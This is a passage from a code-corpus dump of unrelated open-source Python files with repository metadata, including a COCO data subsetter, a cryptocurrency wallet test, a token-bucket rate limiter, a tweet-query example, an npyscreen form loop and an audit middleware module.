# Writing to stdout gives the answer to bot.js
print s
elif command[0] == 'x':
# Just in case
thread.interrupt_main()
def main():
s = server(str(sys.argv[1]).upper(), sys.argv[2], sys.argv[3])
s.run()
if __name__ == "__main__":
main()
| 21.482143 | 88 | 0.56276 |
b0059397dfc4c469f960d7334eb639af26280fba | 6,845 | py | Python | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | null | null | null | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | 2 | 2019-11-19T01:35:14.000Z | 2019-11-19T01:37:20.000Z | notebooks/utils/coco.py | YangFei1990/mask-rcnn-tensorflow | 81179b412b341cc02b44391eda64f571bbe6847e | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
import shutil
from pycocotools.coco import COCO
import matplotlib.pyplot as plt
from pathlib import Path
import json
class COCOSubsetter(object):
"""
Tools for subsetting COCO data. Can be used to create a smaller subset of
data either randomly, or by using in conjunction with pycocotools
to subset by category. Can also be used to duplicate a dataset. For example,
if the user wants to train on a single image for testing, that image can be
duplicated multiple times.
"""
def __init__(self, data_dir):
"""
Parameters
----------
data_dir : str
Filepath location of of COCO data. Expects to find
subdirectories for train2017 and annotations
"""
self.data_dir = Path(data_dir)
self.instance_file = self.data_dir.joinpath('annotations/instances_train2017.json')
self.train_dir = self.data_dir.joinpath('train2017')
self.images = list(self.train_dir.glob('*.jpg'))
self.images = {int(os.path.splitext(os.path.basename(i.as_posix()))[0]): \
i for i in self.images}
self.load_annotations()
return
def random_subset(self, count):
"""
Parameters
----------
count : int
the number of random images to select
Returns
-------
dict
dictionary of {image_id: Path(image)}
"""
images = np.random.choice(list(self.images.keys()), size=count)
return {i:self.images[i] for i in images}
def load_annotations(self):
"""
Load annotations for COCO data
Returns
-------
"""
with open(self.instance_file) as infile:
self.instances = json.load(infile)
def _create_new_annotations(self, annotations, images):
"""
Used for generating a new set of annotations
info licenses and categories are the same for
the subset, so just copy them. For annotations
and images, take a new set to combine.
Parameters
----------
annotations : list[dict]
a list of dictionaries of annotations
images : list[dict]
a list of dictionaries of image information
Returns
-------
dict
A dictionary mirroring the annotations format
"""
new_annotations = dict()
new_annotations['info'] = self.instances['info']
new_annotations['licenses'] = self.instances['licenses']
new_annotations['categories'] = self.instances['categories']
new_annotations['annotations'] = annotations
new_annotations['images'] = images
return new_annotations
def filter_annotations(self, images):
"""
Given a set of image ids, subset the annotations and images
and combine with other fields of the annotations file
Parameters
----------
images : list[int]
a list of image ids
Returns
-------
dict
A dictionary of new annotations
"""
annotations = [i for i in self.instances['annotations'] if i['image_id'] in images]
images = [i for i in self.instances['images'] if i['id'] in images]
return self._create_new_annotations(annotations, images)
def duplicate_annotations(self, count):
"""
Create duplicates of the annotations by incrementing ids and filenames.
Given a count, apply the range of (0,count) to the end of the image ids
and filenames.
Parameters
----------
count : int
The number of time to duplicate the annotations
Returns
-------
dict
A dictionary of new annotations
"""
new_annotations = []
new_images = []
for num in range(count):
for anno in self.instances['annotations']:
anno_copy = anno.copy()
anno_copy['image_id'] = int("{}{}".format(anno['image_id'], str(num)))
new_annotations.append(anno_copy)
for image in self.instances['images']:
image_copy = image.copy()
filename = os.path.splitext(image_copy['file_name'])
image_copy['file_name'] = "{}{}{}".format(filename[0],
str(num),
filename[1])
new_images.append(image_copy)
return self._create_new_annotations(new_annotations, new_images)
def create_subset_dir(self, dir):
"""
Checks if the output directory exists and creates it if it doesn't
Parameters
----------
dir : str
filepath for output
Returns
-------
None
Raises
------
AssertionError
If directory already exists, return error
"""
assert not dir.exists(), "directory {} exists".format(dir.as_posix())
dir.mkdir()
dir.joinpath('annotations').mkdir()
dir.joinpath('train2017').mkdir()
def create_subset(self, images, dir):
"""
Create a new dataset based on a list of images
Parameters
----------
images : list[int]
A list of image ids
dir : str
path for output
Returns
-------
None
"""
dir = Path(dir)
self.create_subset_dir(dir)
for image in images:
shutil.copy(self.images[image],
dir.joinpath('train2017').joinpath(os.path.basename(self.images[image])))
with open(dir.joinpath('annotations').joinpath('instances_train2017.json'), 'w') as anno_file:
anno_file.write(json.dumps(self.filter_annotations(images)))
def duplicate_dataset(self, count, dir):
"""
Create a new dataset with duplicated images
Parameters
----------
count : int
Number of duplicates to generate
dir : str
output directory
Returns
-------
None
"""
dir = Path(dir)
self.create_subset_dir(dir)
new_annotations = self.duplicate_annotations(count)
for image in self.images.values():
basename, _ = os.path.splitext(os.path.basename(image))
for num in range(count):
new_file = basename + str(num) + '.jpg'
shutil.copy(image,
dir.joinpath('train2017').joinpath(new_file))
with open(dir.joinpath('annotations').joinpath('instances_train2017.json'), 'w') as outfile:
outfile.write(json.dumps(new_annotations))
| 32.595238 | 102 | 0.563477 |
5d8e213b6292be8fd7e6c845f2c1fc281c6261db | 3,943 | py | Python | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | 1 | 2021-10-07T01:18:40.000Z | 2021-10-07T01:18:40.000Z | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | null | null | null | test/functional/wallet_groups.py | daface45/cerebralcoin | 0ea3caf2b22113c31c8fd3672f9dc6fa092ffd29 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2018 The Cerebralcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet group functionality."""
from test_framework.test_framework import CerebralcoinTestFramework
from test_framework.messages import CTransaction, FromHex, ToHex
from test_framework.util import (
assert_equal,
)
def assert_approx(v, vexp, vspan=0.00001):
if v < vexp - vspan:
raise AssertionError("%s < [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
if v > vexp + vspan:
raise AssertionError("%s > [%s..%s]" % (str(v), str(vexp - vspan), str(vexp + vspan)))
class WalletGroupTest(CerebralcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [[], [], ['-avoidpartialspends']]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Mine some coins
self.nodes[0].generate(110)
# Get some addresses from the two nodes
addr1 = [self.nodes[1].getnewaddress() for i in range(3)]
addr2 = [self.nodes[2].getnewaddress() for i in range(3)]
addrs = addr1 + addr2
# Send 1 + 0.5 coin to each address
[self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs]
[self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs]
self.nodes[0].generate(1)
self.sync_all()
# For each node, send 0.2 coins back to 0;
# - node[1] should pick one 0.5 UTXO and leave the rest
# - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a
# given address, and leave the rest
txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx1 = self.nodes[1].getrawtransaction(txid1, True)
# txid1 should have 1 input and 2 outputs
assert_equal(1, len(tx1["vin"]))
assert_equal(2, len(tx1["vout"]))
# one output should be 0.2, the other should be ~0.3
v = [vout["value"] for vout in tx1["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 0.3, 0.0001)
txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
tx2 = self.nodes[2].getrawtransaction(txid2, True)
# txid2 should have 2 inputs and 2 outputs
assert_equal(2, len(tx2["vin"]))
assert_equal(2, len(tx2["vout"]))
# one output should be 0.2, the other should be ~1.3
v = [vout["value"] for vout in tx2["vout"]]
v.sort()
assert_approx(v[0], 0.2)
assert_approx(v[1], 1.3, 0.0001)
# Empty out node2's wallet
self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
# Fill node2's wallet with 10000 outputs corresponding to the same
# scriptPubKey
for i in range(5):
raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 0.05}])
tx = FromHex(CTransaction(), raw_tx)
tx.vin = []
tx.vout = [tx.vout[0]] * 2000
funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx))
signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex'])
self.nodes[0].sendrawtransaction(signed_tx['hex'])
self.nodes[0].generate(1)
self.sync_all()
# Check that we can create a transaction that only requires ~100 of our
# utxos, without pulling in all outputs and creating a transaction that
# is way too big.
assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5)
if __name__ == '__main__':
WalletGroupTest().main ()
| 40.649485 | 137 | 0.62313 |
60c6b201c5eb3bed118279ee71078fb25f5a1766 | 1,909 | py | Python | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | kombu/utils/limits.py | public/kombu | 8a882232098f82baabbae4cba0c0b9f5b456382e | [
"BSD-3-Clause"
] | null | null | null | """
kombu.utils.limits
==================
Token bucket implementation for rate limiting.
:copyright: (c) 2009 - 2012 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
import time
__all__ = ['TokenBucket']
class TokenBucket(object):
"""Token Bucket Algorithm.
See http://en.wikipedia.org/wiki/Token_Bucket
Most of this code was stolen from an entry in the ASPN Python Cookbook:
http://code.activestate.com/recipes/511490/
.. admonition:: Thread safety
This implementation may not be thread safe.
"""
#: The rate in tokens/second that the bucket will be refilled
fill_rate = None
#: Maximum number of tokensin the bucket.
capacity = 1
#: Timestamp of the last time a token was taken out of the bucket.
timestamp = None
def __init__(self, fill_rate, capacity=1):
self.capacity = float(capacity)
self._tokens = capacity
self.fill_rate = float(fill_rate)
self.timestamp = time.time()
def can_consume(self, tokens=1):
"""Returns :const:`True` if `tokens` number of tokens can be consumed
from the bucket."""
if tokens <= self._get_tokens():
self._tokens -= tokens
return True
return False
def expected_time(self, tokens=1):
"""Returns the expected time in seconds when a new token should be
available.
.. admonition:: Warning
This consumes a token from the bucket.
"""
_tokens = self._get_tokens()
tokens = max(tokens, _tokens)
return (tokens - _tokens) / self.fill_rate
def _get_tokens(self):
if self._tokens < self.capacity:
now = time.time()
delta = self.fill_rate * (now - self.timestamp)
self._tokens = min(self.capacity, self._tokens + delta)
self.timestamp = now
return self._tokens
| 26.513889 | 77 | 0.623363 |
dd73b9f045aae924fe65d7ae910ad63d90d65fae | 1,938 | py | Python | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | 6 | 2019-07-14T06:13:12.000Z | 2022-03-01T08:42:17.000Z | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | null | null | null | cosSim.py | Xls1994/Cilin | fabfd2b4ea67ba8ba8c6380e3afc338864e19f47 | [
"Apache-2.0"
] | 1 | 2022-03-07T17:10:40.000Z | 2022-03-07T17:10:40.000Z | # coding: utf-8
def cos(vector1,vector2):
dot_product = 0.0
normA = 0.0
normB = 0.0
for a,b in zip(vector1,vector2):
dot_product += a*b
normA += a**2
normB += b**2
if normA == 0.0 or normB==0.0:
return None
else:
print normA
return dot_product / ((normA*normB)**0.5)
def cosNumpy(A,B):
import numpy as np
A = np.array(A,dtype='float32')
B = np.array(B,dtype='float32')
num =A.dot(B.T)
denom =np.linalg.norm(A)* np.linalg.norm(B)
print np.linalg.norm(A)
return (num/denom)
def loadSys(path,repath):
import codecs
re =codecs.open(repath,'w',encoding='utf-8')
with codecs.open(path,'r',encoding='utf-8')as f:
for line in f:
arr =line.strip().split(' ')
w =arr[0].split(',')
for ww in w:
if ww==u'对':
re.write(line)
elif ww==u'对于':
re.write(line)
re.close()
def loadDict(path):
import codecs
f =codecs.open(path,'r','utf-8')
words ={}
embeddings =[]
n=0
for line in f:
n+=1
arrays =line.strip().split(' ')
for w in arrays[1:]:
embeddings.append(float(w))
embeddings =np.asarray(embeddings,dtype='float32')
if not words.has_key(arrays[0]):
words[arrays[0]]=embeddings
else:
print arrays[0]
embeddings=[]
f.close()
print len(words)
print n
return words
if __name__=='__main__':
import numpy as np
from Spearman import calcutaWord
# A =np.loadtxt('vec.txt',delimiter=' ',dtype='float32')
#
# print cos(A,A)
#
# print cosNumpy(A,A)
embeddings =loadDict('dicts.txt')
calcutaWord('11',embeddings)
# path =['vectors/sysnet.txt','dicts.txt']
# loadSys(path[0],path[1]) | 26.189189 | 61 | 0.518576 |
4a643a041ce244556ee986e257b9de4a559c5863 | 4,998 | py | Python | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | 2 | 2020-01-19T18:11:05.000Z | 2020-01-19T18:12:07.000Z | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | 1 | 2020-01-15T01:57:04.000Z | 2020-01-15T01:57:04.000Z | leo/external/npyscreen/fm_form_edit_loop.py | leonidborisenko/leo-editor | db55bd00c94fb8501795284453891ad64ce12af9 | [
"MIT"
] | null | null | null | #@+leo-ver=5-thin
#@+node:ekr.20170428084207.311: * @file ../external/npyscreen/fm_form_edit_loop.py
#!/usr/bin/env python
# encoding: utf-8
import leo.core.leoGlobals as g
assert g
#@+others
#@+node:ekr.20170428084207.312: ** Declarations
"""
form_edit_loop.py
Created by Nicholas Cole on 2008-03-31.
Copyright (c) 2008 __MyCompanyName__. All rights reserved.
"""
# import sys
# import os
import weakref
#@+node:ekr.20170428084207.313: ** class FormNewEditLoop
class FormNewEditLoop:
"Edit Fields .editing = False"
#@+others
#@+node:ekr.20170428084207.314: *3* pre_edit_loop
def pre_edit_loop(self):
pass
#@+node:ekr.20170428084207.315: *3* post_edit_loop
def post_edit_loop(self):
pass
#@+node:ekr.20170428084207.316: *3* _during_edit_loop
def _during_edit_loop(self):
pass
#@+node:ekr.20170428084207.317: *3* FormNewEditLoop.edit_loop
def edit_loop(self):
# g.trace('===== (FormNewEditLoop)')
self.editing = True
self.display()
while not (self._widgets__[self.editw].editable and not self._widgets__[self.editw].hidden):
self.editw += 1
if self.editw > len(self._widgets__)-1:
self.editing = False
return False
while self.editing:
if not self.ALL_SHOWN: self.on_screen()
self.while_editing(weakref.proxy(self._widgets__[self.editw]))
self._during_edit_loop()
if not self.editing:
break
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
self.handle_exiting_widgets(self._widgets__[self.editw].how_exited)
if self.editw > len(self._widgets__)-1: self.editw = len(self._widgets__)-1
#@+node:ekr.20170428084207.318: *3* FormNewEditLoop.edit
def edit(self):
# g.trace('===== (FormNewEditLoop)')
self.pre_edit_loop()
self.edit_loop()
self.post_edit_loop()
#@-others
#@+node:ekr.20170428084207.319: ** class FormDefaultEditLoop
class FormDefaultEditLoop:
#@+others
#@+node:ekr.20170428084207.320: *3* FormDefaultEditLoop.edit (fm_form_edit_loop.py)
def edit(self):
"""
Edit the fields until the user selects the ok button added in the lower
right corner. Button will be removed when editing finishes
"""
# g.trace('===== (FormDefaultEditLoop:%s)' % self.__class__.__name__)
# Add ok button. Will remove later
tmp_rely, tmp_relx = self.nextrely, self.nextrelx
my, mx = self.curses_pad.getmaxyx()
ok_button_text = self.__class__.OK_BUTTON_TEXT
my -= self.__class__.OK_BUTTON_BR_OFFSET[0]
mx -= len(ok_button_text)+self.__class__.OK_BUTTON_BR_OFFSET[1]
self.ok_button = self.add_widget(self.__class__.OKBUTTON_TYPE, name=ok_button_text, rely=my, relx=mx, use_max_space=True)
ok_button_postion = len(self._widgets__)-1
self.ok_button.update()
# End add buttons
self.editing=True
if self.editw < 0: self.editw=0
if self.editw > len(self._widgets__)-1:
self.editw = len(self._widgets__)-1
if not self.preserve_selected_widget:
self.editw = 0
if not self._widgets__[self.editw].editable: self.find_next_editable()
self.display()
while not (self._widgets__[self.editw].editable and not self._widgets__[self.editw].hidden):
self.editw += 1
if self.editw > len(self._widgets__)-1:
self.editing = False
return False
while self.editing:
if not self.ALL_SHOWN: self.on_screen()
self.while_editing(weakref.proxy(self._widgets__[self.editw]))
if not self.editing:
break
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
self.handle_exiting_widgets(self._widgets__[self.editw].how_exited)
if self.editw > len(self._widgets__)-1:
self.editw = len(self._widgets__)-1
if self.ok_button.value:
self.editing = False
self.ok_button.destroy()
del self._widgets__[ok_button_postion]
del self.ok_button
self.nextrely, self.nextrelx = tmp_rely, tmp_relx
self.display()
#try:
# self.parentApp._FORM_VISIT_LIST.pop()
#except:
# pass
self.editing = False
self.erase()
#@+node:ekr.20170428084207.321: *3* move_ok_button
def move_ok_button(self):
if hasattr(self, 'ok_button'):
my, mx = self.curses_pad.getmaxyx()
my -= self.__class__.OK_BUTTON_BR_OFFSET[0]
mx -= len(self.__class__.OK_BUTTON_TEXT)+self.__class__.OK_BUTTON_BR_OFFSET[1]
self.ok_button.relx = mx
self.ok_button.rely = my
#@-others
#@-others
#@@language python
#@@tabwidth -4
#@-leo
| 34 | 129 | 0.626251 |
8ee4171a115907fe52a4f699534e31976f816706 | 2,037 | py | Python | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | modelling/model.py | alceballosa/BikeDemandEACD | b9edc2af5326b407872a791643b74f0d47728b43 | [
"MIT"
] | null | null | null | import typing as t
from sklearn.base import BaseEstimator
from sklearn.base import TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
import xgboost as xgb
class BikeRentalFeatureSelection(BaseEstimator, TransformerMixin):
def __init__(self, feature_columns):
self.feature_columns = feature_columns
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.feature_columns]
class BikeColumnTransformer(BaseEstimator, TransformerMixin):
"""Bike column transformer that processes categorical features
for usage with XGBoost regressor.
Since we are working only with tree algorithms, we do not do preprocessing on the
continuous variables.
"""
def __init__(self, categorical_features):
self.categorical_features = categorical_features
self._column_transformer = ColumnTransformer(
transformers=[
(
"onehot",
OneHotEncoder(handle_unknown="ignore"),
self.categorical_features,
),
],
remainder="passthrough",
sparse_threshold=0,
)
def fit(self, X, y=None):
self._column_transformer = self._column_transformer.fit(X, y=y)
return self
def transform(self, X):
X_ = self._column_transformer.transform(X)
return X_
def build_estimator(hyperparams: t.Dict[str, t.Any]):
estimator_mapping = get_estimator_mapping()
steps = []
for name, params in hyperparams.items():
estimator = estimator_mapping[name](**params)
steps.append((name, estimator))
model = Pipeline(steps)
return model
def get_estimator_mapping():
return {
"selector": BikeRentalFeatureSelection,
"column_transformer": BikeColumnTransformer,
"regressor": xgb.XGBRegressor,
} | 29.955882 | 85 | 0.677958 |
87069d82fac43c28809b3f5e892175f4e4461183 | 612 | py | Python | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | 1 | 2020-06-26T09:36:03.000Z | 2020-06-26T09:36:03.000Z | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | null | null | null | rt-front-web-client-python/xyz/redtorch/client/python/base/EventConstant.py | xxx520/trade | 4b7c9052aaa9c15a3fabf9f5a0528267919b0bea | [
"MIT"
] | 5 | 2020-06-26T09:35:10.000Z | 2021-12-10T08:53:21.000Z | EVENT_TICK = "E_TICK|"
EVENT_TICKS_CHANGED = "E_TICKS_CHANGED|"
EVENT_TICKS = "E_TICKS|"
EVENT_TRADE = "E_TRADE|"
EVENT_TRADES = "E_TRADES|"
EVENT_ORDER = "E_ORDER|"
EVENT_ORDERS = "E_ORDERS|"
EVENT_POSITION = "E_POSITION|"
EVENT_POSITIONS = "E_POSITIONS|"
EVENT_ACCOUNT = "E_ACCOUNT|"
EVENT_ACCOUNTS = "E_ACCOUNTS|"
EVENT_CONTRACT = "E_CONTRACT|"
EVENT_CONTRACTS = "E_CONTRACTS|"
EVENT_ERROR = "E_ERROR|"
EVENT_ERRORS = "E_ERRORS|"
EVENT_GATEWAY = "E_GATEWAY|"
EVENT_GATEWAYS = "E_GATEWAYS|"
EVENT_LOG = "E_LOG|"
EVENT_LOGS = "E_LOGS|"
EVENT_THREAD_STOP = "E_THREAD_STOP|" | 30.6 | 42 | 0.70915 |
cd100af10f9bb4cbbac9edd6151bc2bc84a7c5cf | 3,879 | py | Python | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 1 | 2020-12-20T23:16:36.000Z | 2020-12-20T23:16:36.000Z | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 2 | 2020-08-14T09:48:25.000Z | 2020-08-14T09:55:21.000Z | drfly/get_meta.py | klml/drfly | ba7be19ae2b418afe4b23ad86782743e223d0f96 | [
"MIT"
] | 1 | 2020-12-20T23:16:49.000Z | 2020-12-20T23:16:49.000Z | #!/usr/bin/env python
# coding: utf-8
import os
import yaml
import time
import re
import git
## load serial data
def get_meta_tree(sourcefile, source_directory_realpath, meta):
## collect meta
# get metadata from file meta.yaml in every directory in sourcepath
stepsourcedir = ''
for index, directory in enumerate(os.path.dirname(sourcefile).split(os.sep)):
stepsourcedir += directory + os.sep
## avoid searching for yaml "under" source_directory
if os.path.commonprefix((stepsourcedir, source_directory_realpath)) == source_directory_realpath:
## define meta file
# [Please use ".yaml" when possible.](https://yaml.org/faq.html)
meta_directory_file = stepsourcedir + 'meta.yaml'
# Check if the metafile exists
if (os.path.isfile(meta_directory_file)):
with open(meta_directory_file, 'r') as openmeta_directory_file:
meta_directory = openmeta_directory_file.read()
meta.update(yaml.load(meta_directory, Loader=yaml.FullLoader))
return meta
def get_meta_file(sourcefile, proserial, meta):
## check if source file includes metadata
try:
proserial_meta = yaml.load(proserial[1], Loader=yaml.FullLoader)
meta.update(proserial_meta)
return meta
## sourcefile-meta is no valid yaml
## or
## sourcefile-meta does not exists
## this is PROSErial conform
## TODO warn user
except:
return meta
def get_html_title_from_first_heading(proserial, meta):
# Define [HTML Title element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/title) ```<title>```
# from first markdown heading as ```pagetitle```
# if it is missing in meta
if 'pagetitle' not in meta:
firsthead = re.search('(?m)^#+(.*)', proserial[0])
if (firsthead != None):
meta['pagetitle'] = firsthead.group(1).strip()
return meta
def get_slugs (sourcefile, source_directory_realpath, config_namespaceseparator):
## create target file slugs
lemma, file_extension = os.path.splitext(os.path.basename(sourcefile) )
## make a source directory relative path
contentdir = os.path.dirname(sourcefile[len(source_directory_realpath) +1 :]) ## + 1 to remove leading slash
# use source directories as __namespace__, with customizing namespaceseperators (```namespace:pagetitle```).
slugdir = contentdir.replace(os.sep, config_namespaceseparator)
## slugs with directories need an trailings namespaceseparator
if (len(contentdir ) > 0):
slugdir = slugdir + config_namespaceseparator
slugs = {}
slugs['lemma'] = lemma
slugs['dirlimb'] = slugdir + lemma
slugs['html'] = slugdir + lemma + '.html'
slugs['json'] = slugdir + lemma + '.json'
source_directory_realpath_len = len(source_directory_realpath)
slugs['source'] = sourcefile[source_directory_realpath_len:]
return slugs
def get_source_git_meta(sourcefile, config_source, source_git_meta_meta):
try:
repo = git.Repo(config_source, search_parent_directories=True)
# https://git-scm.com/docs/pretty-formats
source_git_meta = {}
source_git_meta['last_name'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_name_format'], sourcefile)
source_git_meta['last_email'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_email_format'], sourcefile)
source_git_meta['last_date'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_date_format'], sourcefile)
source_git_meta['last_subject'] = repo.git.log('-1', '--format=' + source_git_meta_meta['last_subject_format'], sourcefile)
# TODO oldest_*
return source_git_meta
except:
return
| 34.633929 | 133 | 0.66744 |
c15a4f8299ef4618c96f74576b40f1f45f5e9755 | 1,316 | py | Python | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | Main.py | nsang0u/TweetMapping | 9e88fea27a4d7fc669d4ea5ad669491c4f8b99c2 | [
"MIT"
] | null | null | null | '''
Examples of how to query for tweets with 'got' package.
'''
import got
def main():
def printTweet(descr, t):
print descr
print "Username: %s" % t.username
print "Retweets: %d" % t.retweets
print "Text: %s" % t.text
print "Mentions: %s" % t.mentions
print "Hashtags: %s\n" % t.hashtags
# Example 1 - Get tweets by username
tweetCriteria = got.manager.TweetCriteria().setUsername('barackobama').setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 1 - Get tweets by username [barackobama]", tweet)
# Example 2 - Get tweets by query search
tweetCriteria = got.manager.TweetCriteria().setQuerySearch('europe refugees').setSince("2015-05-01").setUntil("2015-09-30").setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 2 - Get tweets by query search [europe refugees]", tweet)
# Example 3 - Get tweets by username and bound dates
tweetCriteria = got.manager.TweetCriteria().setUsername("barackobama").setSince("2015-09-10").setUntil("2015-09-12").setMaxTweets(1)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)[0]
printTweet("### Example 3 - Get tweets by username and bound dates [barackobama, '2015-09-10', '2015-09-12']", tweet)
if __name__ == '__main__':
main()
| 35.567568 | 140 | 0.715805 |
4c508dd7b24bf9e5963375d855cb8106f9dfdb65 | 492 | py | Python | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-07T16:29:02.000Z | 2020-05-07T16:29:02.000Z | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 74 | 2020-01-30T07:27:54.000Z | 2021-08-03T05:47:17.000Z | Tests/misc/eexec_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-01-22T20:06:09.000Z | 2020-01-22T20:06:09.000Z | from fontTools.misc.py23 import *
from fontTools.misc.eexec import decrypt, encrypt
def test_decrypt():
testStr = b"\0\0asdadads asds\265"
decryptedStr, R = decrypt(testStr, 12321)
assert decryptedStr == b'0d\nh\x15\xe8\xc4\xb2\x15\x1d\x108\x1a<6\xa1'
assert R == 36142
def test_encrypt():
testStr = b'0d\nh\x15\xe8\xc4\xb2\x15\x1d\x108\x1a<6\xa1'
encryptedStr, R = encrypt(testStr, 12321)
assert encryptedStr == b"\0\0asdadads asds\265"
assert R == 36142
| 28.941176 | 74 | 0.693089 |
d1c8e3ebf323c6180fa224d235cd842e52670c36 | 30,409 | py | Python | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | auditmiddleware/_api.py | Pagolin/openstack-audit-middleware | f7917408684f82da6e64b77fc906514accae04ea | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This package contains the logic for creating events from API requests."""
import collections
import hashlib
import json
import os
import re
import six
import socket
import uuid
import yaml
from oslo_log import log as logging
from pycadf.attachment import Attachment
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import eventfactory
from pycadf import host
from pycadf import reason
from pycadf import resource
ResourceSpec = collections.namedtuple('ResourceSpec',
['type_name', 'el_type_name',
'type_uri', 'el_type_uri', 'singleton',
'id_field', 'name_field',
'custom_actions', 'custom_attributes',
'children', 'payloads'])
# default mappings from HTTP methods to CADF actions
_method_action_map = {'GET': taxonomy.ACTION_READ,
'HEAD': taxonomy.ACTION_READ,
'PUT': taxonomy.ACTION_UPDATE,
'PATCH': taxonomy.ACTION_UPDATE, 'POST':
taxonomy.ACTION_CREATE,
'DELETE': taxonomy.ACTION_DELETE}
# action suffixes for operations on custom keys (modelled as path suffixes)
_key_action_suffix_map = {taxonomy.ACTION_READ: '/get',
taxonomy.ACTION_UPDATE: '/set',
taxonomy.ACTION_CREATE: '/put',
taxonomy.ACTION_DELETE: '/unset'}
# matcher for UUIDs
_UUID_RE = re.compile("[0-9a-f-]+$")
def _make_uuid(s):
if s.isdigit():
return str(uuid.UUID(int=int(s)))
else:
return s
class ConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
pass
